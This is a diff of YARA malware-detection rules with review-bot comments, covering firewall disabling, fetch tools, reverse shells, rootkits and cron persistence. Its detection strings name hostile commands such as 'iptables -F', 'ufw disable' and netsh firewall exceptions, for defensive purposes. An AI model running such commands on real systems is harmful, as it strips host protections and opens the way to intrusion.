+++ b/rules/hw/dev/sd_mmc.yara
@@ -4,9 +4,22 @@ rule dev_mmc: high {
 description = "access raw SD/MMC devices"
 strings:
- $val = /\/dev\/mmcblk[\$%\w\{\}]{0,16}/
- $block_val = /\/dev\/block\/mmcblk[\$%\w\{\}]{0,16}/
+ $dev_mmc = /\/dev\/mmcblk[\$%\w\{\}]{0,16}/
+ $dev_block = /\/dev\/block\/mmcblk[\$%\w\{\}]{0,16}/
 condition:
- filesize < 10MB and any of them
+ filesize < 10MB and any of ($dev*)
+}
+
+rule dev_mmc_ok: override {
+ meta:
+ dev_mmc = "medium"
+
+ strings:
+ $not_fwupd = "fu_firmware_set_id"
+ $not_ipmi = "/dev/ipmi"
+ $not_grub = "GRUB" fullword
+
+ condition:
+ dev_mmc and any of them
 }
diff --git a/rules/hw/dev/ubi.yara b/rules/hw/dev/ubi.yara
index 5ee50137e..11af74d4f 100644
--- a/rules/hw/dev/ubi.yara
+++ b/rules/hw/dev/ubi.yara
@@ -9,3 +9,17 @@ rule ubi: high linux {
 condition:
 any of them
 }
+
+rule expected_ubi_users: override {
+ meta:
+ ubi = "medium"
+
+ strings:
+ $libuboot = "libuboot"
+ $usage = "Usage:"
+ $ubi = "ubifs" fullword
+ $UBI = "UBI version"
+
+ condition:
+ filesize < 512KB and ubi and any of them
+}
diff --git a/rules/impact/degrade/firewall.yara b/rules/impact/degrade/firewall.yara
new file mode 100644
index 000000000..86076f55d
--- /dev/null
+++ b/rules/impact/degrade/firewall.yara
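Review bot: In dev_mmc_ok the strings are named `$not_fwupd`, `$not_ipmi` and `$not_grub` but the condition `dev_mmc and any of them` uses them as positive allow-list matches, whereas the `$not_` prefix elsewhere in this tree marks strings consumed by `none of ($not*)`; renaming them (`$fwupd`, `$ipmi`, `$grub`) avoids a later edit wiring them into a `none of` clause by habit. expected_ubi_users in ubi.yara on this line has the mirror-image weakness: `$usage = "Usage:"` downgrades the ubi finding for any file under 512KB that prints a usage line, which says nothing about whether it is an expected UBI user.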
@@ -0,0 +1,93 @@
+import "math"
+
+rule selinux_firewall: high linux {
+ meta:
+ hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97"
+ hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed"
+ hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f"
+ filetypes = "elf,so"
+ description = "references both SELinux and iptables/firewalld"
+
+ strings:
+ $selinux = /SELINUX[=\w]{0,32}/ fullword
+ $f_iptables = /iptables[ -\w]{0,32}/
+ $f_firewalld = /[\w ]{0,32}firewalld/
+ $not_ip6tables = "NFTNL_RULE_TABLE"
+ $not_iptables = "iptables-restore"
+ $not_iptables_nft = "iptables-nft"
+ $not_selinux_init = "SELINUX_INIT"
+ $not_define = "#define" fullword
+ $not_netlink = "NETLINK" fullword
+ $not_containerd = "containerd" fullword
+
+ condition:
+ filesize < 1MB and $selinux and any of ($f*) and none of ($not*)
+}
+
+import "math"
+
+private rule ufw_tool {
+ strings:
+ $not_route = "route-insert"
+ $not_statusverbose = "statusverbose"
+ $not_enables_the = "enables the"
+ $not_enable_the = "enable the"
+ $not_enable = "ufw enable"
+
+ condition:
+ filesize < 256KB and any of them
+}
+
+rule ufw_disable_word: high {
+ meta:
+ description = "disables ufw firewall"
+
+ strings:
+ $ref = /ufw['", ]{1,4}disable/ fullword
+
+ condition:
+ filesize < 256KB and $ref and not ufw_tool
+}
+
+rule iptables_disable: high {
+ meta:
+ description = "disables iptables firewall"
+
+ strings:
+ $input = "iptables -P INPUT ACCEPT"
+ $output = "iptables -P OUTPUT ACCEPT"
+ $forward = "iptables -P FORWARD ACCEPT"
+ $flush = "iptables -F"
+
+ condition:
+ filesize < 1MB and 3 of them
+}
+
+rule netsh_firewall: high windows {
+ meta:
+ description = "adds exception to Windows netsh firewall"
+
+ strings:
+ $netsh = "netsh"
+ $firewall = "firewall"
+ $firewall2 = "advfirewall"
+ $allowedprogram = /allowedprogram.{0,64}ENABLE/
+
+ condition:
+ $netsh and any of ($firewall*) and $allowedprogram
+}
+
+rule netsh_firewall_split: high windows {
+ meta:
+ description = "adds exception to Windows netsh firewall"
+
+ strings:
+ $netsh = "netsh"
+ $firewall = "firewall"
+ $firewall2 = "advfirewall"
+ $allowedprogram = "allowedprogram"
+ $ENABLE = "ENABLE"
+
+ condition:
+ filesize < 5MB and $netsh and any of ($firewall*) and $allowedprogram and $ENABLE
+}
diff --git a/rules/impact/degrade/iptables.yara b/rules/impact/degrade/iptables.yara
deleted file mode 100644
index 162b11189..000000000
--- a/rules/impact/degrade/iptables.yara
+++ /dev/null
@@ -1,16 +0,0 @@
-import "math"
-
-rule iptables_disable: high {
- meta:
- description = "disables iptables firewall"
-
- strings:
- $input = "iptables -P INPUT ACCEPT"
- $output = "iptables -P OUTPUT ACCEPT"
- $forward = "iptables -P FORWARD ACCEPT"
- $flush = "iptables -F"
-
- condition:
- filesize < 1MB and 3 of them
-}
-
diff --git a/rules/impact/degrade/selinux_firewall.yara b/rules/impact/degrade/selinux_firewall.yara
deleted file mode 100644
index 5e86a102a..000000000
--- a/rules/impact/degrade/selinux_firewall.yara
+++ /dev/null
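Review bot: `import "math"` appears twice in firewall.yara (at the top and again just before ufw_tool) and nothing in the file references the math module, so both lines can go; a second import in the middle of a file is at best redundant and I have not verified that every YARA version accepts it. netsh_firewall has no filesize bound while its sibling netsh_firewall_split uses `filesize < 5MB`; suggest `filesize < 5MB and $netsh and any of ($firewall*) and $allowedprogram` for consistency. ufw_tool's `$not_*` strings are consumed positively by `any of them`, so the prefix is misleading there as well.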
@@ -1,22 +0,0 @@
-rule selinux_firewall: high linux {
- meta:
- hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97"
- hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed"
- hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f"
- filetypes = "elf,so"
- description = "references both SELinux and iptables/firewalld"
-
- strings:
- $selinux = /SELINUX[=\w]{0,32}/ fullword
- $f_iptables = /iptables[ -\w]{0,32}/
- $f_firewalld = /[\w ]{0,32}firewalld/
- $not_ip6tables = "NFTNL_RULE_TABLE"
- $not_iptables = "iptables-restore"
- $not_iptables_nft = "iptables-nft"
- $not_selinux_init = "SELINUX_INIT"
- $not_define = "#define" fullword
- $not_netlink = "NETLINK" fullword
-
- condition:
- filesize < 1MB and $selinux and any of ($f*) and none of ($not*)
-}
diff --git a/rules/impact/degrade/ufw.yara b/rules/impact/degrade/ufw.yara
deleted file mode 100644
index 113440907..000000000
--- a/rules/impact/degrade/ufw.yara
+++ /dev/null
@@ -1,24 +0,0 @@
-import "math"
-
-private rule ufw_tool {
- strings:
- $not_route = "route-insert"
- $not_statusverbose = "statusverbose"
- $not_enables_the = "enables the"
- $not_enable_the = "enable the"
- $not_enable = "ufw enable"
-
- condition:
- filesize < 256KB and any of them
-}
-
-rule ufw_disable_word: high {
- meta:
- description = "disables ufw firewall"
-
- strings:
- $ref = /ufw['", ]{1,4}disable/ fullword
-
- condition:
- filesize < 256KB and $ref and not ufw_tool
-}
diff --git a/rules/impact/exploit/GCONV_PATH.yara b/rules/impact/exploit/GCONV_PATH.yara
index f086ac0f1..ffb449398 100644
--- a/rules/impact/exploit/GCONV_PATH.yara
+++ b/rules/impact/exploit/GCONV_PATH.yara
@@ -1,4 +1,4 @@
-rule gconv_path: low {
+rule gconv_path: harmless {
 meta:
 description = "references character conversion configuration"
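Review bot: Dropping gconv_path to `harmless` removes the only signal for the GCONV_PATH environment variable, which is the hook used by a well-known setuid/pkexec local privilege escalation technique; the rule is noisy on its own, but at `harmless` it can no longer corroborate anything. Suggest keeping it at `low`, or pairing the downgrade with a higher-severity rule that requires GCONV_PATH together with a gconv-modules or setuid indicator, and recording the reasoning in the meta, e.g. `description = "references character conversion configuration (GCONV_PATH)"`. The rule body continues outside this hunk.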
diff --git a/rules/impact/exploit/exploit.yara b/rules/impact/exploit/exploit.yara
index fb1e92b08..593214103 100644
--- a/rules/impact/exploit/exploit.yara
+++ b/rules/impact/exploit/exploit.yara
@@ -24,6 +24,18 @@ rule exploitation: medium {
 any of ($ref*) and none of ($not*) and not legal_license
 }
+rule Exploit: medium {
+ meta:
+ description = "References an exploit"
+
+ strings:
+ $ref6 = "Exploit" fullword
+ $not_reduction = "Exploit reduction"
+
+ condition:
+ any of ($ref*) and none of ($not*) and not legal_license
+}
+
 rule exploiter: high {
 meta:
 description = "References an exploit"
@@ -36,7 +48,6 @@ rule exploiter: high {
 $ref3 = "sploit" fullword
 $ref4 = "spl0it" fullword
 $ref5 = "pop a shell" fullword
- $ref6 = "Exploit" fullword
 $not_ms_example = "Drive-by Compromise"
 condition:
diff --git a/rules/impact/remote_access/backdoor.yara b/rules/impact/remote_access/backdoor.yara
index 35203ede1..bdc825193 100644
--- a/rules/impact/remote_access/backdoor.yara
+++ b/rules/impact/remote_access/backdoor.yara
@@ -10,7 +10,7 @@ private rule wordlist {
 filesize < 100MB and 3 of them
 }
-rule backdoor: high {
+rule backdoor: medium {
 meta:
 description = "References a 'backdoor'"
 hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2"
@@ -20,8 +20,12 @@ rule backdoor: high {
 strings:
 $ref = /[a-zA-Z\-_ \']{0,16}[bB]ackdoor[a-zA-Z\-_ ]{0,16}/ fullword
+ $not_vcpu = "VCPUInfoBackdoor"
+ $not_vmware = "gGuestBackdoorOps"
+ $not_comment = "# backdoor:"
+
 condition:
- filesize < 40MB and any of them and not wordlist
+ filesize < 40MB and any of them and not wordlist and none of ($not*)
 }
 rule backdoor_caps: high {
diff --git a/rules/impact/remote_access/botnet.yara b/rules/impact/remote_access/botnet.yara
index b6062c164..898e16df1 100644
--- a/rules/impact/remote_access/botnet.yara
+++ b/rules/impact/remote_access/botnet.yara
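Review bot: The new rule is named `Exploit` with a capital letter while every other rule here (`exploitation`, `exploiter`, `backdoor`) is lowercase, and rule names surface as finding identifiers in the test expectation files elsewhere in this commit, so this one would appear as a capitalised outlier; suggest `rule exploit_word: medium {` or similar. Its only string keeps the `$ref6` numbering from the rule it was moved out of; `$ref` reads better now that it stands alone. In the backdoor hunk on this line, `$not_comment = "# backdoor:"` clears the rule for any script that labels its own backdoor in a comment, which is worth confirming as intended.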
@@ -1,13 +1,13 @@
 rule bot: medium {
 meta:
- description = "References a 'botnet'"
+ description = "References a 'bot'"
 strings:
- $bot_deployed = "bot deployed"
- $botnet = "Botnet"
+ $BOTDIR = "BOTDIR"
+ $botdir = "botdir"
 condition:
- filesize < 20MB and any of them
+ filesize < 1MB and any of them
 }
 rule botnet_high: high {
diff --git a/rules/impact/remote_access/listen_shell.yara b/rules/impact/remote_access/listen_shell.yara
index 3c5c11ec9..33d14bb3b 100644
--- a/rules/impact/remote_access/listen_shell.yara
+++ b/rules/impact/remote_access/listen_shell.yara
@@ -1,4 +1,4 @@
-rule listens_and_executes_shell: high {
+rule listens_and_executes_shell: medium {
 meta:
 description = "Listens at a port and executes shells"
 hash_2024_Downloads_8cad = "8cad755bcf420135c0f406fb92138dcb0c1602bf72c15ed725bd3b76062dafe5"
@@ -22,9 +22,12 @@ rule listens_and_executes_shell: high {
 $sh_cmd = "cmd.exe"
 $not_setlocale = "setlocale" fullword
 $not_ptrace = "ptrace" fullword
+ $not_image_jpeg = "image/jpeg"
+ $not_openpgp = "openpgp"
+ $not_dbus = "dbus" fullword
 condition:
- filesize < 10MB and any of ($f_sock*) and any of ($f_exec*) and any of ($f_inet*) and any of ($f_listen*) and any of ($sh*) and none of ($not*)
+ filesize < 3MB and any of ($f_sock*) and any of ($f_exec*) and any of ($f_inet*) and any of ($f_listen*) and any of ($sh*) and none of ($not*)
 }
 rule go_tcp_listen_and_exec_shell: high {
diff --git a/rules/impact/remote_access/net_term.yara b/rules/impact/remote_access/net_term.yara
index 46253ad95..93a5f3c99 100644
--- a/rules/impact/remote_access/net_term.yara
+++ b/rules/impact/remote_access/net_term.yara
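Review bot: The new `$not_dbus = "dbus" fullword`, `$not_openpgp` and `$not_image_jpeg` exclusions apply to the whole listens_and_executes_shell rule, so a binary that listens on a socket and spawns a shell is cleared by merely referencing dbus or a MIME type, on top of the severity dropping to medium and the size bound to 3MB. If these were added for specific false positives, suggest naming the tool rather than the word (`$not_dbus_daemon = "dbus-daemon"`) or pairing each with a second tool-specific string. The bot rule on this line now matches only `BOTDIR`/`botdir`, so its meta should say so, e.g. `description = "References a bot directory (BOTDIR)"`.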
@@ -84,16 +84,18 @@ rule miner_kvryr_stak_alike: high {
 hash_2023_Linux_Malware_Samples_39c3 = "39c33c261899f2cb91f686aa6da234175237cd72cfcd9291a6e51cbdc86d4def"
 strings:
- $upload = "upload"
- $shell = "shell" fullword
- $bin_sh = "/bin/"
- $tcsetattr = "tcsetattr"
- $termios = "termios" fullword
- $execve = "execve"
- $numa = "NUMA"
+ $f_upload = "upload"
+ $f_shell = "shell" fullword
+ $f_bin_sh = "/bin/"
+ $f_tcsetattr = "tcsetattr"
+ $f_termios = "termios" fullword
+ $f_execve = "execve"
+ $f_numa = "NUMA"
+
+ $not_perf = "PERF_RECORD"
 condition:
- filesize < 12MB and all of them
+ filesize < 12MB and all of ($f*) and none of ($not*)
 }
 rule proxy_http_aes_terminal_combo: medium {
diff --git a/rules/impact/remote_access/py_setuptools.yara b/rules/impact/remote_access/py_setuptools.yara
index f58daf7d9..15134cf47 100644
--- a/rules/impact/remote_access/py_setuptools.yara
+++ b/rules/impact/remote_access/py_setuptools.yara
@@ -14,7 +14,7 @@ private rule pythonSetup {
 $not_distutils = "from distutils.errors import"
 condition:
- filesize < 128KB and $setup and any of ($i*) and none of ($not*)
+ filesize < 128KB and $setup and any of ($i*) in (0..1024) and none of ($not*)
 }
 rule setuptools_oslogin: medium {
diff --git a/rules/impact/remote_access/reverse_shell.yara b/rules/impact/remote_access/reverse_shell.yara
index dbaaa9df1..457354201 100644
--- a/rules/impact/remote_access/reverse_shell.yara
+++ b/rules/impact/remote_access/reverse_shell.yara
@@ -32,8 +32,10 @@ rule possible_reverse_shell: medium {
 $sh_bash = "/bin/bash"
 $sh = "/bin/sh"
+ $not_uc2 = "ucs2reverse"
+
 condition:
- filesize < 4MB and any of ($sh*) and all of ($f*)
+ filesize < 4MB and any of ($sh*) and all of ($f*) and none of ($not*)
 }
 rule mkfifo_netcat: critical {
diff --git a/rules/impact/rootkit/readdir-interceptor.yara b/rules/impact/rootkit/readdir-interceptor.yara
deleted file mode 100644
index 63864c70a..000000000
--- a/rules/impact/rootkit/readdir-interceptor.yara
+++ /dev/null
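Review bot: `any of ($i*) in (0..1024)` in pythonSetup restricts the import strings to the first 1KB of setup.py, and every rule built on this private rule inherits that; a setup.py that opens with a long license block, module docstring or boilerplate pushes its imports past that offset and the dependent rules silently stop matching. Suggest a wider window such as `any of ($i*) in (0..4096)` or a meta note stating the assumption. pythonSetup's string definitions are outside this hunk, and `$not_uc2` in the reverse_shell.yara hunk on this line looks like a typo for the `ucs2reverse` it matches.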
@@ -1,65 +0,0 @@
-rule readdir_intercept: high {
- meta:
- description = "userland rootkit designed to hide files (readdir64)"
- hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
- hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
- hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586"
- filetypes = "so,c"
-
- strings:
- $r_new65 = "readdir64" fullword
- $r_old64 = "_readdir64"
- $r_new32 = "readdir" fullword
- $r_old32 = "_readdir"
- $not_ld_debug = "LD_DEBUG"
- $not_libc = "getusershell"
-
- condition:
- filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) and none of ($not*)
-}
-
-rule readdir_tcp_wrapper_intercept: high {
- meta:
- description = "userland rootkit designed to hide files and bypass tcp-wrappers"
- ref = "https://github.com/ldpreload/Medusa"
- filetypes = "so,c"
-
- strings:
- $r_new65 = "readdir64" fullword
- $r_old64 = "_readdir64"
- $r_new32 = "readdir" fullword
- $r_old32 = "_readdir"
- $r_hosts_access = "hosts_access"
-
- condition:
- filesize < 2MB and uint32(0) == 1179403647 and all of ($r*)
-}
-
-rule readdir_intercept_source: high {
- meta:
- description = "userland rootkit source designed to hide files (DECLARE_READDIR)"
- filetypes = "so,c"
-
- strings:
- $declare = "DECLARE_READDIR"
- $hide = "hide"
-
- condition:
- filesize < 200KB and all of them
-}
-
-rule lkm_dirent: high {
- meta:
- description = "kernel rootkit designed to hide files (linux_dirent)"
- hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
- filetypes = "so"
-
- strings:
- $l_dirent = "linux_dirent"
- $linux = "Linux"
- $not_syscalls = "#define _LINUX_SYSCALLS_H"
- $not_itimer = "__kernel_old_itimerval"
-
- condition:
- filesize < 2MB and all of ($l*) and none of ($not*)
-}
diff --git a/rules/lateral/scan/scan_tool.yara b/rules/lateral/scan/scan_tool.yara
index eb3018d43..2a62612a9 100644
--- a/rules/lateral/scan/scan_tool.yara
+++ b/rules/lateral/scan/scan_tool.yara
@@ -7,18 +7,33 @@ rule generic_scan_tool: medium {
 strings:
 $f_gethostbyname = "gethostbyname"
- $f_socket = "socket"
- $f_connect = "connect"
+ $f_ip = "%d.%d.%d.%d" fullword
+ $f_socket = "socket" fullword
+ $f_connect = "connect" fullword
 $o_banner = "banner"
 $o_Probe = "Probe"
 $o_probe = "probe"
 $o_scan = "scan"
 $o_port = "port"
 $o_target = "target"
+ $o_Port = "Port"
+ $o_Target = "Target"
 $not_nss = "NSS_USE_SHEXP_IN_CERT_NAME"
 $not_microsoft = "Microsoft Corporation"
 $not_php_reference = "ftp_nb_put"
 condition:
- all of ($f*) and 2 of ($o*) and none of ($not*)
+ 3 of ($f*) and 2 of ($o*) and none of ($not*)
+}
+
+rule root_scan_tool: high {
+ meta:
+ description = "may try to get root on other systems"
+
+ strings:
+ $root_the = /[\w \.]{0,32}root the [\w \.\%]{0,32}/
+ $r00t = /[\w \.]{0,32}r00t[\w \.]{0,32}/
+
+ condition:
+ filesize < 20MB and generic_scan_tool and any of them
 }
diff --git a/rules/malware/family/medusa.yara b/rules/malware/family/medusa.yara
index 59cae14cf..5701a3647 100644
--- a/rules/malware/family/medusa.yara
+++ b/rules/malware/family/medusa.yara
@@ -14,7 +14,8 @@ rule medusa: critical linux {
 $rkload = "rkload" fullword
 $wcs = "wcsmbsload" fullword
 $readdir64 = "readdir64" fullword
+ $backup_ld = "backup_ld" fullword
 condition:
- filesize < 2MB and 80 % of them
+ filesize < 2MB and all of them
 }
diff --git a/rules/net/dns/dns-over-https.yara b/rules/net/dns/dns-over-https.yara
index 255614bc7..55ad3f1cf 100644
--- a/rules/net/dns/dns-over-https.yara
+++ b/rules/net/dns/dns-over-https.yara
@@ -11,6 +11,7 @@ rule doh_refs: medium {
 $contentType = "application/dns-message"
 $dnspod = "dnspod"
 $doh_url = "doh-url" fullword
+ $cloudflare = "https://9.9.9.9/dns-query"
 condition:
 any of them
diff --git a/rules/net/download/fetch.yara b/rules/net/download/fetch.yara
index 9850a4323..46f74f9d1 100644
--- a/rules/net/download/fetch.yara
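Review bot: Changing medusa's condition from `80 % of them` to `all of them` while adding `$backup_ld` means a sample missing any single listed string (a stripped or repacked build) drops from critical to no finding at all; the percentage form was the tolerance for exactly that. Suggest keeping `filesize < 2MB and 80 % of them`, or `all of them` only if `$backup_ld` is confirmed present in every hash the rule lists. The rule's string list begins outside this hunk.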
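Review bot: In the dns-over-https.yara hunk the identifier `$cloudflare` is attached to `https://9.9.9.9/dns-query`, which is the Quad9 resolver rather than Cloudflare, and the name will mislead anyone tuning the rule later; suggest `$quad9 = "https://9.9.9.9/dns-query"`. The rest of doh_refs' strings are not visible in this hunk.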
+++ b/rules/net/download/fetch.yara
@@ -47,33 +47,33 @@ rule fetch_tool: medium {
 description = "calls a URL fetch tool"
 strings:
- $t_curl_O = "curl -O"
- $t_curl_o = "curl -o"
- $t_wget = "wget -"
- $t_wget_http = "wget http"
- $t_quiet_output = "-q -O "
- $t_kinda_curl_o = "url -o "
- $t_kinda_curl_O = "url -O "
- $t_kinda_curl_silent_insecure = "silent --insecure"
- $t_kinda_curl_qk = /url.{0,4}-k -q/
- $t_ftp = "ftp -"
- $t_tftp = "tftp "
- $t_ftpget = "ftpget " fullword
+ $t_curl_O = /[a-z]url [-\w ]{0,8}-[oOk] [ \w\:\/\-\.]{0,32}/
+ $t_wget = /wget [ \w\:\/\-\.]{4,32}/
+ $t_curl_qk = /[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) [ \w\:\/\-\.]{0,32}/
+ $t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.]{0,32}/
+ $t_tftp = /tftp [ \w\:\/\-\.]{0,32}/
 condition:
- filesize < 5MB and any of ($t_*)
+ filesize < 1MB and any of ($t_*)
 }
-rule executable_calls_fetch_tool: high {
+rule binary_calls_fetch_tool: high {
 meta:
- description = "executable that calls a fetch tool"
+ description = "binary calls fetch tool"
 filetypes = "macho,elf"
 strings:
- $not_tftp = "Illegal TFTP operation"
+ $t_curl_O = /[a-z]url [-\w ]{0,8}-[oOk] [ \w\:\/\-\.\"]{0,32}/
+ $t_wget = /wget [ \w\:\/\-\.\"]{4,32}/
+ $t_curl_qk = /[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) [ \w\:\/\-\.\"]{0,32}/
+ $t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.]{0,32}/
+ $t_tftp = /tftp [ \w\:\/\-\.\"]{0,32}/
+
+ $not_tftp = "Illegal TFTP operation"
+ $not_tftp_err = "tftp error"
 condition:
- filesize < 5MB and (elf or macho) and fetch_tool and none of ($not*)
+ filesize < 10MB and (elf or macho) and any of ($t*) and none of ($not*)
 }
 rule curl_agent_val: high {
@@ -138,6 +138,7 @@ rule high_fetch_command_val: high {
 $not_s_key = "curl -s --key"
 $not_local = "curl -ks https://localhost"
 $not_continue = "--continue-at"
+ $not_pciid = "https://pci-ids.ucw.cz"
 $x_chmod = "chmod" fullword
 $x_Chmod = "Chmod" fullword
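Review bot: In binary_calls_fetch_tool the trailing character class of `$t_curl_kq` omits `\"` while the other four patterns include it, so a quoted URL matches after `-k -q` in one argument order but not the other; suggest `$t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.\"]{0,32}/`. Separately, the literal set this hunk replaces covered `ftp -`, `ftpget ` and a bare `-q -O `, none of which the new regexes match, so fetch_tool's coverage narrows in addition to its size bound falling from 5MB to 1MB; a short meta note on why those were dropped would help the next reader.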
diff --git a/rules/net/ftp/tftp.yara b/rules/net/ftp/tftp.yara
new file mode 100644
index 000000000..b1f17f574
--- /dev/null
+++ b/rules/net/ftp/tftp.yara
@@ -0,0 +1,11 @@
+rule tftp {
+ meta:
+ description = "Trivial File Transfer Protocol (TFTP)"
+
+ strings:
+ $ref = "tftp" fullword
+ $ref2 = "TFTP" fullword
+
+ condition:
+ filesize < 1MB and any of them
+}
diff --git a/rules/net/ip/spoof.yara b/rules/net/ip/spoof.yara
index 5891a27fa..9b37a7ac3 100644
--- a/rules/net/ip/spoof.yara
+++ b/rules/net/ip/spoof.yara
@@ -6,9 +6,11 @@ rule spoof: medium {
 hash_2022_devicespoofer_2_2_setup = "195d69dc251a045b01fdd6854327c545283b36ebae7c54e06599b14b50ec39e6"
 strings:
- $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword
- $Spoof = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword
+ $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword
+ $spoof2 = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword
+
+ $not_chk = "Spoofchk"
 condition:
- any of them
+ any of ($s*) and none of ($not*)
 }
diff --git a/rules/persist/cron/echo_crontab.yara b/rules/persist/cron/echo_crontab.yara
deleted file mode 100644
index 3a2ed0633..000000000
--- a/rules/persist/cron/echo_crontab.yara
+++ /dev/null
@@ -1,12 +0,0 @@
-rule echo_crontab: high {
- meta:
- hash_2020_Enigma = "6b2ff7ae79caf306c381a55409c6b969c04b20c8fda25e6d590e0dadfcf452de"
- hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
- hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
-
- strings:
- $echo = /echo.{0,10}\* \* \* \*.{0,24}cron[\w\/ \-]{0,16}/
-
- condition:
- $echo
-}
diff --git a/rules/persist/cron/etc_cron_d.yara b/rules/persist/cron/etc_cron_d.yara
new file mode 100644
index 000000000..9f7721074
--- /dev/null
+++ b/rules/persist/cron/etc_cron_d.yara
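Review bot: `rule tftp {` is the only rule in this change without a severity tag, so its reported level depends on whatever the loader defaults to, while every sibling declares one; `rule tftp: low {` would match the protocol-reference intent of the description. Fullword `tftp`/`TFTP` under 1MB will also fire on any network utility's help text, so consider whether this should be a standalone finding or a private rule feeding binary_calls_fetch_tool, which already carries its own tftp exclusions.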
@@ -0,0 +1,12 @@
+rule cron_d_user: high {
+ meta:
+ description = "Uses /etc/cron.d to persist"
+
+ strings:
+ $c_etc_crontab = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/
+
+ $not_usage = "usage: cron"
+
+ condition:
+ filesize < 52428800 and any of ($c*) and none of ($not*)
+}
diff --git a/rules/persist/cron/hidden_crontab.yara b/rules/persist/cron/hidden_crontab.yara
deleted file mode 100644
index 9743db792..000000000
--- a/rules/persist/cron/hidden_crontab.yara
+++ /dev/null
@@ -1,17 +0,0 @@
-rule hidden_crontab: critical {
- meta:
- description = "persists via a hidden crontab entry"
- hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
- hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
- hash_2024_Chaos_27cd = "27cdb8d8f64ce395795fdbde10cf3a08e7b217c92b7af89cde22abbf951b9e99"
-
- strings:
- $crontab = "crontab"
- $c_periodic_with_user = /\*[\/\d]{0,3} \* \* \* \* [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
- $c_periodic = /\*[\/\d]{0,3} \* \* \* \* [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
- $c_nickname_with_user = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
- $c_nickname = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
-
- condition:
- $crontab and any of ($c_*)
-}
diff --git a/rules/persist/cron/crontab.yara b/rules/persist/cron/tab.yara
similarity index 64%
rename from rules/persist/cron/crontab.yara
rename to rules/persist/cron/tab.yara
index 20ac884bc..c3720fe5c 100644
--- a/rules/persist/cron/crontab.yara
+++ b/rules/persist/cron/tab.yara
@@ -17,7 +17,6 @@ rule crontab_writer: medium {
 hash_2023_ZIP_server = "b69738c655dee0071b1ce37ab5227018ebce01ba5e90d28bd82d63c46e9e63a4"
 strings:
- $c_etc_crontab = /\/etc\/cron[\/\w\.]{0,32}/
 $c_crontab_e = "crontab -"
 $c_var_spool_cron = "/var/spool/cron"
 $not_usage = "usage: cron"
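Review bot: cron_d_user writes its bound as the raw byte count `filesize < 52428800` where the rest of this change expresses sizes as `50MB`; suggest `filesize < 50MB and any of ($c*) and none of ($not*)` so the limit is legible and comparable with the neighbouring cron rules. The regex `\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}` also caps the matched file name at 16 characters, so longer names under /etc/cron.d are silently missed; `{1,32}` costs nothing here.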
@@ -66,3 +65,34 @@ rule crontab_danger_path: high {
 condition:
 filesize < 104857600 and any of them
 }
+
+rule hidden_crontab: critical {
+ meta:
+ description = "persists via a hidden crontab entry"
+ hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
+ hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
+ hash_2024_Chaos_27cd = "27cdb8d8f64ce395795fdbde10cf3a08e7b217c92b7af89cde22abbf951b9e99"
+
+ strings:
+ $crontab = "crontab"
+ $c_periodic_with_user = /\*[\/\d]{0,3} \* \* \* \* [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+ $c_periodic = /\*[\/\d]{0,3} \* \* \* \* [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
